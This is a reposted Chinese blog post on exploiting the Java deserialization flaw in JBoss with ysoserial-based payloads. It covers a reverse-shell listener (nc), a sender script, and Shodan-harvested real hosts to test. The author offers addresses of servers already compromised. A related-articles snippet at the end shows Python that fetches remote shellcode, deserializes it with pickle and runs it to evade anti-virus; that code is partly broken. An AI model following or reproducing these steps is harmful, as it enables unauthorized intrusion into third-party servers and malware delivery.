java反序列化 exp_java反序列化exp实践

最新推荐文章于 2023-02-08 11:02:21 发布
最新推荐文章于 2023-02-08 11:02:21 发布
阅读量201 收藏
点赞数
文章标签: java反序列化 exp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34125336/article/details/114203435
版权

这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波

exp来源

ysoserial

其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包.

foxlovesec

iswin

http://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/ - 随风师傅分析漏洞原理,并基于foxglovesec提供的payload生成脚本,给出基于两种不同方法的改进版exp和poc,exp里调用了随风师傅的java版反弹shell方法,它的好处是不依赖操作系统环境,兼容win和linux,使反弹shell成功率和稳定性更高.

随后,随风师傅在zone.wooyun发帖教学exp的使用,并积极指点新手白帽子进行实践. http://zone.wooyun.org/content/23905

实践

资源打包

Java_payload 随风师傅给出的改良版exp和foxlove的项目代码

jbossexp.py 一个利用脚本,用于发包

kiss10500.bin/kiss10501.bin 我测试时生成的两个payload

shodan_data.xml 从shodan拿了一些JBOSS服务的主机IP

shodan_data.xml_sorted 整理后的url,用于批量poc

payload生成

用eclipse打开Java_payload项目,按如下路径找到main.java

07e0af656b7f441b32ccfe34fe9d1d5f.png

代码很清晰,找到ip和端口的地方,填入自己机器上用于接受反弹shell的**公网**ip和port.然后下面的路径是生成payload的保存地址.

92cb22257311b849992f3065cca6adf3.png

运行main.java不报错即可

到指定路径检查payload文件是否已经生成

确定目标

在shodan_data.xml列表里找几个网站,放到sebug的照妖镜里测试一下是否存在漏洞.

d1cd316837b02202383e6ca4965172d2.png

反弹shell

首先打开自己在公网接收shell的主机 使用以下命令监听端口,等待连接 nc -lv 10501

然后开启另一个命令行,使用python的发包脚本向目标机发送payload. 命令格式python jbossexp.py [url] [port] [payload]

随后公网主机会接收到反弹的shell,如下图.

d4018b9a304a6c686b69790053e7dac2.png

注意

并不是所有sebug验证出漏洞的地址都能顺利反弹shell,经个人测试,成功率在50%-60%左右,请多加尝试! 可以邮箱联系我索取已经验证成功并拿到shell的地址.

参考

天上繁b,乃前辈所装,虽历历在目,仍不可尽数.向大牛们学习!

藍色珊瑚礁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java序列攻击
01-21
Java 序列攻击漏洞由FoxGlove 的近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。   由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,也意味着使用了这些包的服务器(目前发现有WebSphere, WebLogic,JBoss),第三方框架(Spring,Groovy),第三方应用(Jenkins),以及依赖于这些服务器,框架或者直接/间接引用这些包的应用都会受到威胁,这样的应用的数量会以百万计。   说到漏洞存在的原因,根本还在于 Java 序列自身的缺陷,众
java序列 exp_java序列-ysoserial-调试分析总结篇(2)
weixin_32287387的博客
02-25 165
前言:这篇主要分析commonCollections2,调用链如下图所示:调用链分析:分析环境:jdk1.8.0序列的入口点为src.zip!/java/util/PriorityQueue.java此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类接下来调用siftDownUsingComparator函数在这里将调用Transfo...
java序列 exp_java序列Commons-Collections5分析
weixin_42522400的博客
02-25 114
BadAttributeValueExceptionpackage org.lain.poc;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections...
JAVA序列exp及使用方法
热门推荐
乐枕的家
12-09 1万+
这两天很火的java序列漏洞,看到乌云大牛已经开始刷分,于是找来实践一波 exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本. 其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包. 更多信息在
java序列 exp_java序列-ysoserial-调试分析总结篇(4)
weixin_30296363的博客
02-25 138
1.前言这篇文章继续分析commoncollections4利用链,这篇文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke射调用方法,所以外层queue里面放的元素随意缩减版的函数调用栈如下图所示:2.利用链分析:调用还是从PriorityQueue.rea...
Java序列工具.zip
05-31
Java序列是一种将之前序列的对象状态转换回对象的过程,它是Java平台中持久数据的一种常见方法。在Java应用程序中,序列用于保存对象的状态以便稍后恢复,或者在网络传输中将对象从一个系统传输到另一个...
WebLogic_EXP.jar WebLogic序列利用工具
10-31
总的来说,WebLogic EXP.jar是一个揭示WebLogic服务器序列漏洞的工具,提醒我们关注Java序列安全问题,确保服务器的安全配置和更新,防止未授权的远程代码执行。同时,了解并掌握这类工具的使用,对于提升...
Java序列入门之URLDNS链1
08-03
本文将深入探讨Java序列的基本概念、相关方法、以及如何利用ysoserial工具进行漏洞利用,特别关注URLDNS链的原理和构建。 首先,Java序列是指将已序列的对象数据恢复为原来的对象状态。在Java中,序列...
ShiroExp-1.3.1-all.jar shiro序列检测工具
01-12
ShiroExp-1.3.1-all.jar shiro序列检测工具 我这里是用于搭建攻防演练演示环境用
dubbo-exp:Dubbo序列一键快速攻击测试工具,支持dubbo协议和http协议,支持hessian序列java原生序列
05-09
a --args gadget入参,多个参数使用多次该命令传入,例-a -a Calc-p --protocol [dubbo|http] 通讯协议名称,默认缺省dubbo-s --serialization [hessian|java] 序列类型,默认缺省hessian-t --target 目标,例:...
Java序列漏洞利用工具(全)
09-14
java序列漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
Java序列漏洞之Weblogic、Jboss利用之payload生成工具
02-12
weblogic序列和jboss序列测试payload,仅供运维人员测试漏洞,请勿非法使用,否则后果自负!
序列序列
Expaner的博客
12-04 262
首先什么是序列序列序列:把对象转换为字节序列的过程称为对象的序列序列:把字节序列恢复为对象的过程称为对象的序列。 通俗的将就是在代码运行的时候,我们可以看到很多的对象,可以是一个,也可以是一类对象的集合,很多的对象数据,这些数据中,有些信息我们想让他持久的保存起来,那么这个序列。就是把内存里面的这些对象给变成一连串的字节描述的过程。常见的就是变成文件 其次什么场...
jenkins java序列_Jenkins Java 序列远程执行代码漏洞(CVE-2017-1000353)
weixin_31308407的博客
02-13 199
Jenkins Java 序列远程执行代码漏洞(CVE-2017-1000353)一、漏洞描述该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。二、漏洞影响版本所有jenkins主版本均受到影响(包括<=2.56版本)所有的jenkins LTS均受到影响(包括&lt...
shiro序列漏洞利用以及exp编写
Thunderclap的博客
02-08 634
为了让浏览器或服务器重启后用户不丢失登录状态,Shiro支持将持久信息序列并加密后保存在Cookie的rememberMe字段中,下次读取时进行解密再序列。但是在Shiro 1.2.4版本之前内置了一个默认且固定的加密Key,导致攻击者可以伪造任意的rememberMe Cookie,进而触发序列漏洞。
java序列 exp_JAVA序列exp及使用方法
weixin_36038435的博客
02-16 414
这两天很火的java序列漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本.其中weblogic和jenkins提供python脚本,但需自己加载payload.而对于jboss和websphere则提供了poc的数据包.更多信息在:foxgl...
Lib之过?Java序列漏洞通用利用分析
weixin_34259159的博客
11-14 435
2019独角兽企业重金招聘Python工程师标准>>> ...
Java序列漏洞CVE-2018-2628 分析
u014715599的博客
12-26 3439
一、 前言 认识Java序列序列 定义: 序列就是把对象的状态信息转换为字节序列(即可以存储或传输的形式)过程   序列即逆过程,由字节流还原成对象   注: 字节序是指多字节数据在计算机内存中存储或者网络传输时各字节的存储顺序。 且看接下来怎么一步步揭开序列漏洞利用的面纱的。(小白文) 二、CVE-2018-2628序列漏洞详情分析 在分析这个漏洞的时候,中间也看了好多前辈...
Python序列免杀执行代码
最新发布
12-07
为了Python序列免杀执行代码,可以使用以下步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列并进行base64编码。 4. 编写exp.py文件进行序列,加载恶意shellcode。 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。 以下是具体操作步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列并进行base64编码。 ```python import requests import base64 url = 'http://yourserver.com/shellcode_bs64.txt' response = requests.get(url) shellcode = response.content # 对shellcode进行序列并进行base64编码 serialized = base64.b64encode(pickle.dumps(shellcode)).decode('utf-8') ``` 4. 编写exp.py文件进行序列,加载恶意shellcode。 ```python import requests import base64 import pickle url = 'http://yourserver.com/shellcode.py' response = requests.get(url) serialized = response.content # 对序列的数据进行序列 data = pickle.loads(base64.b64decode(serialized)) # 加载恶意shellcode exec(data) ``` 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值